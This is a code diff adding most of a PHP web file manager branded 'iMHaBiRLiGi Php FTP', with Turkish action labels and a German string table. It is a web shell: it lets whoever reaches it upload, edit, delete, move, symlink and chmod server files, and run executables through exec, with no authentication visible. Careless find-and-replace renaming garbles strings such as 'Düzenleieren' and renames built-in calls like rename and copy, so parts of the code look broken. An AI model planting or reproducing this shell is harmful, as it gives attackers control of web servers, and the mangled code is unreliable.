+<td class="dialog">
+	<input type="hidden" name="action" value="Degistir" />
+	<input type="hidden" name="file" value="' . html($file) . '" />
+	<input type="hidden" name="dir" value="' . html($directory) . '" />
+	<b>' . word('Degistir_file') . '</b>
+	<p>' . html($file) . '</p>
+	<hr />
+	' . word('Yol') . ':
+	<input type="text" name="Yol" size="' . textfieldsize($file) . '" value="' . html($file) . '" />
+	<input type="submit" value="' . word('Degistir') . '" />
+</td>
+</tr>
+</table>
+
+<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('Geri') . ' ]</a></p>
+
+</form>
+
+';
+
+		html_footer();
+
+	}
+
+	break;
+
+case 'Tasi':
+
+	if (!empty($_POST['Yol'])) {
+
+		$dest = relative2absolute($_POST['Yol'], $directory);
+
+		$failure = array();
+		$success = array();
+
+		foreach ($files as $file) {
+			$filename = substr($file, strlen($directory));
+			$d = $dest . $filename;
+			if (!@file_exists($d) && @Degistir($file, $d)) {
+				$success[] = $file;
+			} else {
+				$failure[] = $file;
+			}
+		}
+
+		$message = '';
+		if (sizeof($failure) > 0) {
+			$message = error('not_Tasid', implode("\n", $failure), $dest);
+		}
+		if (sizeof($success) > 0) {
+			$message .= notice('Tasid', implode("\n", $success), $dest);
+		}
+
+		listing_page($message);
+
+	} else {
+
+		html_header();
+
+		echo '<form action="' . $self . '" method="post">
+
+<table class="dialog">
+<tr>
+<td class="dialog">
+';
+
+		request_dump();
+
+		echo "\t<b>" . word('Tasi_files') . '</b>
+	<p>
+';
+
+		foreach ($files as $file) {
+			echo "\t" . html($file) . "<br />\n";
+		}
+
+		echo '	</p>
+	<hr />
+	' . word('Yol') . ':
+	<input type="text" name="Yol" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" />
+	<input type="submit" value="' . word('Tasi') . '" />
+</td>
+</tr>
+</table>
+
+<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('Geri') . ' ]</a></p>
+
+</form>
+
+';
+
+		html_footer();
+
+	}
+
+	break;
+
+case 'Kopyala':
+
+	if (!empty($_POST['Yol'])) {
+
+		$dest = relative2absolute($_POST['Yol'], $directory);
+
+		if (@is_dir($dest)) {
+
+			$failure = array();
+			$success = array();
+
+			foreach ($files as $file) {
+				$filename = substr($file, strlen($directory));
+				$d = addslash($dest) . $filename;
+				if (!@is_dir($file) && !@file_exists($d) && @Kopyala($file, $d)) {
+					$success[] = $file;
+				} else {
+					$failure[] = $file;
+				}
+			}
+
+			$message = '';
+			if (sizeof($failure) > 0) {
+				$message = error('not_copied', implode("\n", $failure), $dest);
+			}
+			if (sizeof($success) > 0) {
+				$message .= notice('copied', implode("\n", $success), $dest);
+			}
+
+			listing_page($message);
+
+		} else {
+
+			if (!@file_exists($dest) && @Kopyala($file, $dest)) {
+				listing_page(notice('copied', $file, $dest));
+			} else {
+				listing_page(error('not_copied', $file, $dest));
+			}
+
+		}
+
+	} else {
+
+		html_header();
+
+		echo '<form action="' . $self . '" method="post">
+
+<table class="dialog">
+<tr>
+<td class="dialog">
+';
+
+		request_dump();
+
+		echo "\n<b>" . word('Kopyala_files') . '</b>
+	<p>
+';
+
+		foreach ($files as $file) {
+			echo "\t" . html($file) . "<br />\n";
+		}
+
+		echo '	</p>
+	<hr />
+	' . word('Yol') . ':
+	<input type="text" name="Yol" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" />
+	<input type="submit" value="' . word('Kopyala') . '" />
+</td>
+</tr>
+</table>
+
+<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('Geri') . ' ]</a></p>
+
+</form>
+
+';
+
+		html_footer();
+
+	}
+
+	break;
+
+case 'create_symlink':
+
+	if (!empty($_POST['Yol'])) {
+
+		$dest = relative2absolute($_POST['Yol'], $directory);
+
+		if (substr($dest, -1, 1) == $delim) $dest .= basename($file);
+
+		if (!empty($_POST['relative'])) $file = absolute2relative(addslash(dirname($dest)), $file);
+
+		if (!@file_exists($dest) && @symlink($file, $dest)) {
+			listing_page(notice('symlinked', $file, $dest));
+		} else {
+			listing_page(error('not_symlinked', $file, $dest));
+		}
+
+	} else {
+
+		html_header();
+
+		echo '<form action="' . $self . '" method="post">
+
+<table class="dialog" id="symlink">
+<tr>
+	<td style="vertical-align: top">' . word('Yol') . ': </td>
+	<td>
+		<b>' . html($file) . '</b><br />
+		<input type="checkbox" name="relative" value="yes" id="checkbox_relative" checked="checked" style="margin-top: 1ex" />
+		<label for="checkbox_relative">' . word('relative') . '</label>
+		<input type="hidden" name="action" value="create_symlink" />
+		<input type="hidden" name="file" value="' . html($file) . '" />
+		<input type="hidden" name="dir" value="' . html($directory) . '" />
+	</td>
+</tr>
+<tr>
+	<td>' . word('symlink') . ': </td>
+	<td>
+		<input type="text" name="Yol" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" />
+		<input type="submit" value="' . word('create_symlink') . '" />
+	</td>
+</tr>
+</table>
+
+<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('Geri') . ' ]</a></p>
+
+</form>
+
+';
+
+		html_footer();
+
+	}
+
+	break;
+
+case 'Düzenle':
+
+	if (!empty($_POST['save'])) {
+
+		$content = str_replace("\r\n", "\n", $_POST['content']);
+
+		if (($f = @fopen($file, 'w')) && @fwrite($f, $content) !== false && @fclose($f)) {
+			listing_page(notice('saved', $file));
+		} else {
+			listing_page(error('not_saved', $file));
+		}
+
+	} else {
+
+		if (@is_readable($file) && @is_writable($file)) {
+			Düzenle($file);
+		} else {
+			listing_page(error('not_Düzenleed', $file));
+		}
+
+	}
+
+	break;
+
+case 'permission':
+
+	if (!empty($_POST['set'])) {
+
+		$mode = 0;
+		if (!empty($_POST['ur'])) $mode |= 0400; if (!empty($_POST['uw'])) $mode |= 0200; if (!empty($_POST['ux'])) $mode |= 0100;
+		if (!empty($_POST['gr'])) $mode |= 0040; if (!empty($_POST['gw'])) $mode |= 0020; if (!empty($_POST['gx'])) $mode |= 0010;
+		if (!empty($_POST['or'])) $mode |= 0004; if (!empty($_POST['ow'])) $mode |= 0002; if (!empty($_POST['ox'])) $mode |= 0001;
+
+		if (@chmod($file, $mode)) {
+			listing_page(notice('permission_set', $file, decoct($mode)));
+		} else {
+			listing_page(error('permission_not_set', $file, decoct($mode)));
+		}
+
+	} else {
+
+		html_header();
+
+		$mode = fileperms($file);
+
+		echo '<form action="' . $self . '" method="post">
+
+<table class="dialog">
+<tr>
+<td class="dialog">
+
+	<p style="margin: 0">' . phrase('permission_for', $file) . '</p>
+
+	<hr />
+
+	<table id="permission">
+	<tr>
+		<td></td>
+		<td style="border-right: 1px solid black">' . word('owner') . '</td>
+		<td style="border-right: 1px solid black">' . word('group') . '</td>
+		<td>' . word('other') . '</td>
+	</tr>
+	<tr>
+		<td style="text-align: right">' . word('read') . ':</td>
+		<td><input type="checkbox" name="ur" value="1"'; if ($mode & 00400) echo ' checked="checked"'; echo ' /></td>
+		<td><input type="checkbox" name="gr" value="1"'; if ($mode & 00040) echo ' checked="checked"'; echo ' /></td>
+		<td><input type="checkbox" name="or" value="1"'; if ($mode & 00004) echo ' checked="checked"'; echo ' /></td>
+	</tr>
+	<tr>
+		<td style="text-align: right">' . word('write') . ':</td>
+		<td><input type="checkbox" name="uw" value="1"'; if ($mode & 00200) echo ' checked="checked"'; echo ' /></td>
+		<td><input type="checkbox" name="gw" value="1"'; if ($mode & 00020) echo ' checked="checked"'; echo ' /></td>
+		<td><input type="checkbox" name="ow" value="1"'; if ($mode & 00002) echo ' checked="checked"'; echo ' /></td>
+	</tr>
+	<tr>
+		<td style="text-align: right">' . word('execute') . ':</td>
+		<td><input type="checkbox" name="ux" value="1"'; if ($mode & 00100) echo ' checked="checked"'; echo ' /></td>
+		<td><input type="checkbox" name="gx" value="1"'; if ($mode & 00010) echo ' checked="checked"'; echo ' /></td>
+		<td><input type="checkbox" name="ox" value="1"'; if ($mode & 00001) echo ' checked="checked"'; echo ' /></td>
+	</tr>
+	</table>
+
+	<hr />
+
+	<input type="submit" name="set" value="' . word('set') . '" />
+
+	<input type="hidden" name="action" value="permission" />
+	<input type="hidden" name="file" value="' . html($file) . '" />
+	<input type="hidden" name="dir" value="' . html($directory) . '" />
+
+</td>
+</tr>
+</table>
+
+<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('Geri') . ' ]</a></p>
+
+</form>
+
+';
+
+		html_footer();
+
+	}
+
+	break;
+
+default:
+
+	listing_page();
+
+}
+
+/* ------------------------------------------------------------------------- */
+
+function getlist ($directory) {
+	global $delim, $win;
+
+	if ($d = @opendir($directory)) {
+
+		while (($filename = @readdir($d)) !== false) {
+
+			$path = $directory . $filename;
+
+			if ($stat = @lstat($path)) {
+
+				$file = array(
+					'filename'    => $filename,
+					'path'        => $path,
+					'is_file'     => @is_file($path),
+					'is_dir'      => @is_dir($path),
+					'is_link'     => @is_link($path),
+					'is_readable' => @is_readable($path),
+					'is_writable' => @is_writable($path),
+					'size'        => $stat['size'],
+					'permission'  => $stat['mode'],
+					'owner'       => $stat['uid'],
+					'group'       => $stat['gid'],
+					'mtime'       => @filemtime($path),
+					'atime'       => @fileatime($path),
+					'ctime'       => @filectime($path)
+				);
+
+				if ($file['is_dir']) {
+					$file['is_executable'] = @file_exists($path . $delim . '.');
+				} else {
+					if (!$win) {
+						$file['is_executable'] = @is_executable($path);
+					} else {
+						$file['is_executable'] = true;
+					}
+				}
+
+				if ($file['is_link']) $file['target'] = @readlink($path);
+
+				if (function_exists('posix_getpwuid')) $file['owner_name'] = @reset(posix_getpwuid($file['owner']));
+				if (function_exists('posix_getgrgid')) $file['group_name'] = @reset(posix_getgrgid($file['group']));
+
+				$files[] = $file;
+
+			}
+
+		}
+
+		return $files;
+
+	} else {
+		return false;
+	}
+
+}
+
+function sortlist (&$list, $key, $reverse) {
+
+	quicksort($list, 0, sizeof($list) - 1, $key);
+
+	if ($reverse) $list = array_reverse($list);
+
+}
+
+function quicksort (&$array, $first, $last, $key) {
+
+	if ($first < $last) {
+
+		$cmp = $array[floor(($first + $last) / 2)][$key];
+
+		$l = $first;
+		$r = $last;
+
+		while ($l <= $r) {
+
+			while ($array[$l][$key] < $cmp) $l++;
+			while ($array[$r][$key] > $cmp) $r--;
+
+			if ($l <= $r) {
+
+				$tmp = $array[$l];
+				$array[$l] = $array[$r];
+				$array[$r] = $tmp;
+
+				$l++;
+				$r--;
+
+			}
+
+		}
+
+		quicksort($array, $first, $r, $key);
+		quicksort($array, $l, $last, $key);
+
+	}
+
+}
+
+function permission_octal2string ($mode) {
+
+	if (($mode & 0xC000) === 0xC000) {
+		$type = 's';
+	} elseif (($mode & 0xA000) === 0xA000) {
+		$type = 'l';
+	} elseif (($mode & 0x8000) === 0x8000) {
+		$type = '-';
+	} elseif (($mode & 0x6000) === 0x6000) {
+		$type = 'b';
+	} elseif (($mode & 0x4000) === 0x4000) {
+		$type = 'd';
+	} elseif (($mode & 0x2000) === 0x2000) {
+		$type = 'c';
+	} elseif (($mode & 0x1000) === 0x1000) {
+		$type = 'p';
+	} else {
+		$type = '?';
+	}
+
+	$owner  = ($mode & 00400) ? 'r' : '-';
+	$owner .= ($mode & 00200) ? 'w' : '-';
+	if ($mode & 0x800) {
+		$owner .= ($mode & 00100) ? 's' : 'S';
+	} else {
+		$owner .= ($mode & 00100) ? 'x' : '-';
+	}
+
+	$group  = ($mode & 00040) ? 'r' : '-';
+	$group .= ($mode & 00020) ? 'w' : '-';
+	if ($mode & 0x400) {
+		$group .= ($mode & 00010) ? 's' : 'S';
+	} else {
+		$group .= ($mode & 00010) ? 'x' : '-';
+	}
+
+	$other  = ($mode & 00004) ? 'r' : '-';
+	$other .= ($mode & 00002) ? 'w' : '-';
+	if ($mode & 0x200) {
+		$other .= ($mode & 00001) ? 't' : 'T';
+	} else {
+		$other .= ($mode & 00001) ? 'x' : '-';
+	}
+
+	return $type . $owner . $group . $other;
+
+}
+
+function is_script ($filename) {
+	return ereg('\.php$|\.php3$|\.php4$|\.php5$', $filename);
+}
+
+function getmimetype ($filename) {
+	static $mimes = array(
+		'\.jpg$|\.jpeg$'  => 'image/jpeg',
+		'\.gif$'          => 'image/gif',
+		'\.png$'          => 'image/png',
+		'\.html$|\.html$' => 'text/html',
+		'\.txt$|\.asc$'   => 'text/plain',
+		'\.xml$|\.xsl$'   => 'application/xml',
+		'\.pdf$'          => 'application/pdf'
+	);
+
+	foreach ($mimes as $regex => $mime) {
+		if (eregi($regex, $filename)) return $mime;
+	}
+
+	// return 'application/octet-stream';
+	return 'text/plain';
+
+}
+
+function del ($file) {
+	global $delim;
+
+	if (!@is_link($file) && !file_exists($file)) return false;
+
+	if (!@is_link($file) && @is_dir($file)) {
+
+		if ($dir = @opendir($file)) {
+
+			$error = false;
+
+			while (($f = readdir($dir)) !== false) {
+				if ($f != '.' && $f != '..' && !del($file . $delim . $f)) {
+					$error = true;
+				}
+			}
+			closedir($dir);
+
+			if (!$error) return @rmdir($file);
+
+			return !$error;
+
+		} else {
+			return false;
+		}
+
+	} else {
+		return @unlink($file);
+	}
+
+}
+
+function addslash ($directory) {
+	global $delim;
+
+	if (substr($directory, -1, 1) != $delim) {
+		return $directory . $delim;
+	} else {
+		return $directory;
+	}
+
+}
+
+function relative2absolute ($string, $directory) {
+
+	if (path_is_relative($string)) {
+		return simplify_path(addslash($directory) . $string);
+	} else {
+		return simplify_path($string);
+	}
+
+}
+
+function path_is_relative ($path) {
+	global $win;
+
+	if ($win) {
+		return (substr($path, 1, 1) != ':');
+	} else {
+		return (substr($path, 0, 1) != '/');
+	}
+
+}
+
+function absolute2relative ($directory, $target) {
+	global $delim;
+
+	$path = '';
+	while ($directory != $target) {
+		if ($directory == substr($target, 0, strlen($directory))) {
+			$path .= substr($target, strlen($directory));
+			break;
+		} else {
+			$path .= '..' . $delim;
+			$directory = substr($directory, 0, strrpos(substr($directory, 0, -1), $delim) + 1);
+		}
+	}
+	if ($path == '') $path = '.';
+
+	return $path;
+
+}
+
+function simplify_path ($path) {
+	global $delim;
+
+	if (@file_exists($path) && function_exists('realpath') && @realpath($path) != '') {
+		$path = realpath($path);
+		if (@is_dir($path)) {
+			return addslash($path);
+		} else {
+			return $path;
+		}
+	}
+
+	$pattern  = $delim . '.' . $delim;
+
+	if (@is_dir($path)) {
+		$path = addslash($path);
+	}
+
+	while (strpos($path, $pattern) !== false) {
+		$path = str_replace($pattern, $delim, $path);
+	}
+
+	$e = addslashes($delim);
+	$regex = $e . '((\.[^\.' . $e . '][^' . $e . ']*)|(\.\.[^' . $e . ']+)|([^\.][^' . $e . ']*))' . $e . '\.\.' . $e;
+
+	while (ereg($regex, $path)) {
+		$path = ereg_replace($regex, $delim, $path);
+	}
+	
+	return $path;
+
+}
+
+function human_filesize ($filesize) {
+
+	$suffices = 'kMGTPE';
+
+	$n = 0;
+	while ($filesize >= 1000) {
+		$filesize /= 1024;
+		$n++;
+	}
+
+	$filesize = round($filesize, 3 - strpos($filesize, '.'));
+
+	if (strpos($filesize, '.') !== false) {
+		while (in_array(substr($filesize, -1, 1), array('0', '.'))) {
+			$filesize = substr($filesize, 0, strlen($filesize) - 1);
+		}
+	}
+
+	$suffix = (($n == 0) ? '' : substr($suffices, $n - 1, 1));
+
+	return $filesize . " {$suffix}B";
+
+}
+
+function strip (&$str) {
+	$str = stripslashes($str);
+}
+
+/* ------------------------------------------------------------------------- */
+
+function listing_page ($message = null) {
+	global $self, $directory, $sort, $reverse;
+
+	html_header();
+
+	$list = getlist($directory);
+
+	if (array_key_exists('sort', $_GET)) $sort = $_GET['sort']; else $sort = 'filename';
+	if (array_key_exists('reverse', $_GET) && $_GET['reverse'] == 'true') $reverse = true; else $reverse = false;
+
+	sortlist($list, $sort, $reverse);
+
+	echo '<h1 style="margin-bottom: 0">iMHaBiRLiGi Php FTP</h1>
+
+<form enctype="multipart/form-data" action="' . $self . '" method="post">
+
+<table id="main">
+';
+
+	directory_choice();
+
+	if (!empty($message)) {
+		spacer();
+		echo $message;
+	}
+
+	if (@is_writable($directory)) {
+		upload_box();
+		create_box();
+	} else {
+		spacer();
+	}
+
+	if ($list) {
+		listing($list);
+	} else {
+		echo error('not_readable', $directory);
+	}
+
+	echo '</table>
+
+</form>
+
+';
+
+	html_footer();
+
+}
+
+function listing ($list) {
+	global $directory, $homedir, $sort, $reverse, $win, $cols, $date_format, $self;
+
+	echo '<tr class="listing">
+	<th style="text-align: center; vertical-align: middle"><img src="' . $self . '?image=smiley" alt="smiley" /></th>
+';
+
+	$d = 'dir=' . urlencode($directory) . '&amp;';
+
+	if (!$reverse && $sort == 'filename') $r = '&amp;reverse=true'; else $r = '';
+	echo "\t<th class=\"filename\"><a href=\"$self?{$d}sort=filename$r\">" . word('filename') . "</a></th>\n";
+
+	if (!$reverse && $sort == 'size') $r = '&amp;reverse=true'; else $r = '';
+	echo "\t<th class=\"size\"><a href=\"$self?{$d}sort=size$r\">" . word('size') . "</a></th>\n";
+
+	if (!$win) {
+
+		if (!$reverse && $sort == 'permission') $r = '&amp;reverse=true'; else $r = '';
+		echo "\t<th class=\"permission_header\"><a href=\"$self?{$d}sort=permission$r\">" . word('permission') . "</a></th>\n";
+
+		if (!$reverse && $sort == 'owner') $r = '&amp;reverse=true'; else $r = '';
+		echo "\t<th class=\"owner\"><a href=\"$self?{$d}sort=owner$r\">" . word('owner') . "</a></th>\n";
+
+		if (!$reverse && $sort == 'group') $r = '&amp;reverse=true'; else $r = '';
+		echo "\t<th class=\"group\"><a href=\"$self?{$d}sort=group$r\">" . word('group') . "</a></th>\n";
+
+	}
+
+	echo '	<th class="Görevler">' . word('Görevler') . '</th>
+</tr>
+';
+
+	for ($i = 0; $i < sizeof($list); $i++) {
+		$file = $list[$i];
+
+		$timestamps  = 'mtime: ' . date($date_format, $file['mtime']) . ', ';
+		$timestamps .= 'atime: ' . date($date_format, $file['atime']) . ', ';
+		$timestamps .= 'ctime: ' . date($date_format, $file['ctime']);
+
+		echo '<tr class="listing">
+	<td class="checkbox"><input type="checkbox" name="checked' . $i . '" value="true" onfocus="activate(\'other\')" /></td>
+	<td class="filename" title="' . html($timestamps) . '">';
+
+		if ($file['is_link']) {
+
+			echo '<img src="' . $self . '?image=link" alt="link" /> ';
+			echo html($file['filename']) . ' &rarr; ';
+
+			$real_file = relative2absolute($file['target'], $directory);
+
+			if (@is_readable($real_file)) {
+				if (@is_dir($real_file)) {
+					echo '[ <a href="' . $self . '?dir=' . urlencode($real_file) . '">' . html($file['target']) . '</a> ]';
+				} else {
+					echo '<a href="' . $self . '?action=view&amp;file=' . urlencode($real_file) . '">' . html($file['target']) . '</a>';
+				}
+			} else {
+				echo html($file['target']);
+			}
+
+		} elseif ($file['is_dir']) {
+
+			echo '<img src="' . $self . '?image=folder" alt="folder" /> [ ';
+			if ($win || $file['is_executable']) {
+				echo '<a href="' . $self . '?dir=' . urlencode($file['path']) . '">' . html($file['filename']) . '</a>';
+			} else {
+				echo html($file['filename']);
+			}
+			echo ' ]';
+
+		} else {
+
+			if (substr($file['filename'], 0, 1) == '.') {
+				echo '<img src="' . $self . '?image=hidden_file" alt="hidden file" /> ';
+			} else {
+				echo '<img src="' . $self . '?image=file" alt="file" /> ';
+			}
+
+			if ($file['is_file'] && $file['is_readable']) {
+			   echo '<a href="' . $self . '?action=view&amp;file=' . urlencode($file['path']) . '">' . html($file['filename']) . '</a>';
+			} else {
+				echo html($file['filename']);
+			}
+
+		}
+
+		if ($file['size'] >= 1000) {
+			$human = ' title="' . human_filesize($file['size']) . '"';
+		} else {
+			$human = '';
+		}
+
+		echo "\t<td class=\"size\"$human>{$file['size']} B</td>\n";
+
+		if (!$win) {
+
+			echo "\t<td class=\"permission\" title=\"" . decoct($file['permission']) . '">';
+
+			$l = !$file['is_link'] && (!function_exists('posix_getuid') || $file['owner'] == posix_getuid());
+			if ($l) echo '<a href="' . $self . '?action=permission&amp;file=' . urlencode($file['path']) . '&amp;dir=' . urlencode($directory) . '">';
+			echo html(permission_octal2string($file['permission']));
+			if ($l) echo '</a>';
+
+			echo "</td>\n";
+
+			if (array_key_exists('owner_name', $file)) {
+				echo "\t<td class=\"owner\" title=\"uid: {$file['owner']}\">{$file['owner_name']}</td>\n";
+			} else {
+				echo "\t<td class=\"owner\">{$file['owner']}</td>\n";
+			}
+
+			if (array_key_exists('group_name', $file)) {
+				echo "\t<td class=\"group\" title=\"gid: {$file['group']}\">{$file['group_name']}</td>\n";
+			} else {
+				echo "\t<td class=\"group\">{$file['group']}</td>\n";
+			}
+
+		}
+
+		echo '	<td class="Görevler">
+		<input type="hidden" name="file' . $i . '" value="' . html($file['path']) . '" />
+';
+
+		$actions = array();
+		if (function_exists('symlink')) {
+			$actions[] = 'create_symlink';
+		}
+		if (@is_writable(dirname($file['path']))) {
+			$actions[] = 'Sil';
+			$actions[] = 'Degistir';
+			$actions[] = 'Tasi';
+		}
+		if ($file['is_file'] && $file['is_readable']) {
+			$actions[] = 'Kopyala';
+			$actions[] = 'indir';
+			if ($file['is_writable']) $actions[] = 'Düzenle';
+		}
+		if (!$win && function_exists('exec') && $file['is_file'] && $file['is_executable'] && file_exists('/bin/sh')) {
+			$actions[] = 'execute';
+		}
+
+		if (sizeof($actions) > 0) {
+
+			echo '		<select class="small" name="action' . $i . '" size="1">
+		<option value="">' . str_repeat('&nbsp;', 30) . '</option>
+';
+
+			foreach ($actions as $action) {
+				echo "\t\t<option value=\"$action\">" . word($action) . "</option>\n";
+			}
+
+			echo '		</select>
+		<input class="small" type="submit" name="submit' . $i . '" value=" &gt; " onfocus="activate(\'other\')" />
+';
+
+		}
+
+		echo '	</td>
+</tr>
+';
+
+	}
+
+	echo '<tr class="listing_footer">
+	<td style="text-align: right; vertical-align: top"><img src="' . $self . '?image=arrow" alt="&gt;" /></td>
+	<td colspan="' . ($cols - 1) . '">
+		<input type="hidden" name="num" value="' . sizeof($list) . '" />
+		<input type="hidden" name="focus" value="" />
+		<input type="hidden" name="olddir" value="' . html($directory) . '" />
+';
+
+	$actions = array();
+	if (@is_writable(dirname($file['path']))) {
+		$actions[] = 'Sil';
+		$actions[] = 'Tasi';
+	}
+	$actions[] = 'Kopyala';
+
+	echo '		<select class="small" name="action_all" size="1">
+		<option value="">' . str_repeat('&nbsp;', 30) . '</option>
+';
+
+	foreach ($actions as $action) {
+		echo "\t\t<option value=\"$action\">" . word($action) . "</option>\n";
+	}
+
+	echo '		</select>
+		<input class="small" type="submit" name="submit_all" value=" &gt; " onfocus="activate(\'other\')" />
+	</td>
+</tr>
+';
+
+}
+
+function directory_choice () {
+	global $directory, $homedir, $cols, $self;
+
+	echo '<tr>
+	<td colspan="' . $cols . '" id="directory">
+		<a href="' . $self . '?dir=' . urlencode($homedir) . '">' . word('directory') . '</a>:
+		<input type="text" name="dir" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" onfocus="activate(\'directory\')" />
+		<input type="submit" name="changedir" value="' . word('change') . '" onfocus="activate(\'directory\')" />
+	</td>
+</tr>
+';
+
+}
+
+function upload_box () {
+	global $cols;
+
+	echo '<tr>
+	<td colspan="' . $cols . '" id="upload">
+		' . word('file') . ':
+		<input type="file" name="upload" onfocus="activate(\'other\')" />
+		<input type="submit" name="submit_upload" value="' . word('upload') . '" onfocus="activate(\'other\')" />
+	</td>
+</tr>
+';
+
+}
+
+function create_box () {
+	global $cols;
+
+	echo '<tr>
+	<td colspan="' . $cols . '" id="create">
+		<select name="create_type" size="1" onfocus="activate(\'create\')">
+		<option value="file">' . word('file') . '</option>
+		<option value="directory">' . word('directory') . '</option>
+		</select>
+		<input type="text" name="create_name" onfocus="activate(\'create\')" />
+		<input type="submit" name="submit_create" value="' . word('create') . '" onfocus="activate(\'create\')" />
+	</td>
+</tr>
+';
+
+}
+
+function Düzenle ($file) {
+	global $self, $directory, $Düzenlecols, $Düzenlerows, $apache, $htpasswd, $htaccess;
+
+	html_header();
+
+	echo '<h2 style="margin-bottom: 3pt">' . html($file) . '</h2>
+
+<form action="' . $self . '" method="post">
+
+<table class="dialog">
+<tr>
+<td class="dialog">
+
+	<textarea name="content" cols="' . $Düzenlecols . '" rows="' . $Düzenlerows . '" WRAP="off">';
+
+	if (array_key_exists('content', $_POST)) {
+		echo $_POST['content'];
+	} else {
+		$f = fopen($file, 'r');
+		while (!feof($f)) {
+			echo html(fread($f, 8192));
+		}
+		fclose($f);
+	}
+
+	if (!empty($_POST['user'])) {
+		echo "\n" . $_POST['user'] . ':' . crypt($_POST['password']);
+	}
+	if (!empty($_POST['basic_auth'])) {
+		if ($win) {
+			$authfile = str_replace('\\', '/', $directory) . $htpasswd;
+		} else {
+			$authfile = $directory . $htpasswd;
+		}
+		echo "\nAuthType Basic\nAuthName &quot;Restricted Directory&quot;\n";
+		echo 'AuthUserFile &quot;' . html($authfile) . "&quot;\n";
+		echo 'Require valid-user';
+	}
+
+	echo '</textarea>
+
+	<hr />
+';
+
+	if ($apache && basename($file) == $htpasswd) {
+		echo '
+	' . word('user') . ': <input type="text" name="user" />
+	' . word('password') . ': <input type="password" name="password" />
+	<input type="submit" value="' . word('add') . '" />
+
+	<hr />
+';
+
+	}
+
+	if ($apache && basename($file) == $htaccess) {
+		echo '
+	<input type="submit" name="basic_auth" value="' . word('add_basic_auth') . '" />
+
+	<hr />
+';
+
+	}
+
+	echo '
+	<input type="hidden" name="action" value="Düzenle" />
+	<input type="hidden" name="file" value="' . html($file) . '" />
+	<input type="hidden" name="dir" value="' . html($directory) . '" />
+	<input type="reset" value="' . word('reset') . '" id="red_button" />
+	<input type="submit" name="save" value="' . word('save') . '" id="green_button" style="margin-left: 50px" />
+
+</td>
+</tr>
+</table>
+
+<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('Geri') . ' ]</a></p>
+
+</form>
+
+';
+
+	html_footer();
+
+}
+
+function spacer () {
+	global $cols;
+
+	echo '<tr>
+	<td colspan="' . $cols . '" style="height: 1em"></td>
+</tr>
+';
+
+}
+
+function textfieldsize ($content) {
+
+	$size = strlen($content) + 5;
+	if ($size < 30) $size = 30;
+
+	return $size;
+
+}
+
+function request_dump () {
+
+	foreach ($_REQUEST as $key => $value) {
+		echo "\t<input type=\"hidden\" name=\"" . html($key) . '" value="' . html($value) . "\" />\n";
+	}
+
+}
+
+/* ------------------------------------------------------------------------- */
+
+function html ($string) {
+	global $charset;
+	return htmlentities($string, ENT_COMPAT, $charset);
+}
+
+function word ($word) {
+	global $words, $word_charset;
+	return htmlentities($words[$word], ENT_COMPAT, $word_charset);
+}
+
+function phrase ($phrase, $arguments) {
+	global $words;
+	static $search;
+
+	if (!is_array($search)) for ($i = 1; $i <= 8; $i++) $search[] = "%$i";
+
+	for ($i = 0; $i < sizeof($arguments); $i++) {
+		$arguments[$i] = nl2br(html($arguments[$i]));
+	}
+
+	$replace = array('{' => '<pre>', '}' =>'</pre>', '[' => '<b>', ']' => '</b>');
+
+	return str_replace($search, $arguments, str_replace(array_keys($replace), $replace, nl2br(html($words[$phrase]))));
+
+}
+
+function getwords ($lang) {
+	global $word_charset, $date_format;
+
+	switch ($lang) {
+	case 'de':
+
+		$date_format = 'd.m.y H:i:s';
+		$word_charset = 'ISO-8859-1';
+
+		return array(
+'directory' => 'Verzeichnis',
+'file' => 'Datei',
+'filename' => 'Dateiname',
+
+'size' => 'Größe',
+'permission' => 'Rechte',
+'owner' => 'Eigner',
+'group' => 'Gruppe',
+'other' => 'Andere',
+'Görevler' => 'Funktionen',
+
+'read' => 'lesen',
+'write' => 'schreiben',
+'execute' => 'ausführen',
+
+'create_symlink' => 'Symlink erstellen',
+'Sil' => 'löschen',
+'Degistir' => 'umbenennen',
+'Tasi' => 'verschieben',
+'Kopyala' => 'kopieren',
+'Düzenle' => 'Düzenleieren',
+'indir' => 'herunterladen',
+'upload' => 'hochladen',
+'create' => 'erstellen',
+'change' => 'wechseln',
+'save' => 'speichern',
+'set' => 'setze',
+'reset' => 'zurücksetzen',
+'relative' => 'Pfad zum Ziel relativ',
+
+'yes' => 'Ja',
+'no' => 'Nein',
+'Geri' => 'zurück',
+'Yol' => 'Ziel',
+'symlink' => 'Symbolischer Link',
+'no_output' => 'keine Ausgabe',
+
+'user' => 'Benutzername',
+'password' => 'Kennwort',
+'add' => 'hinzufügen',
+'add_basic_auth' => 'HTTP-Basic-Auth hinzufügen',
+
+'uploaded' => '"[%1]" wurde hochgeladen.',
+'not_uploaded' => '"[%1]" konnte nicht hochgeladen werden.',
+'already_exists' => '"[%1]" existiert bereits.',
+'created' => '"[%1]" wurde erstellt.',
+'not_created' => '"[%1]" konnte nicht erstellt werden.',
+'really_Sil' => 'Sollen folgende Dateien wirklich gelöscht werden?',
+'Sild' => "Folgende Dateien wurden gelöscht:\n[%1]",
+'not_Sild' => "Folgende Dateien konnten nicht gelöscht werden:\n[%1]",
+'Degistir_file' => 'Benenne Datei um:',
+'Degistird' => '"[%1]" wurde in "[%2]" umbenannt.',
+'not_Degistird' => '"[%1] konnte nicht in "[%2]" umbenannt werden.',
+'Tasi_files' => 'Verschieben folgende Dateien:',
+'Tasid' => "Folgende Dateien wurden nach \"[%2]\" verschoben:\n[%1]",
+'not_Tasid' => "Folgende Dateien konnten nicht nach \"[%2]\" verschoben werden:\n[%1]",
+'Kopyala_files' => 'Kopiere folgende Dateien:',
+'copied' => "Folgende Dateien wurden nach \"[%2]\" kopiert:\n[%1]",
+'not_copied' => "Folgende Dateien konnten nicht nach \"[%2]\" kopiert werden:\n[%1]",
+'not_Düzenleed' => '"[%1]" kann nicht Düzenleiert werden.',
+'executed' => "\"[%1]\" wurde erfolgreich ausgeführt:\n{%2}",
+'not_executed' => "\"[%1]\" konnte nicht erfolgreich ausgeführt werden:\n{%2}",
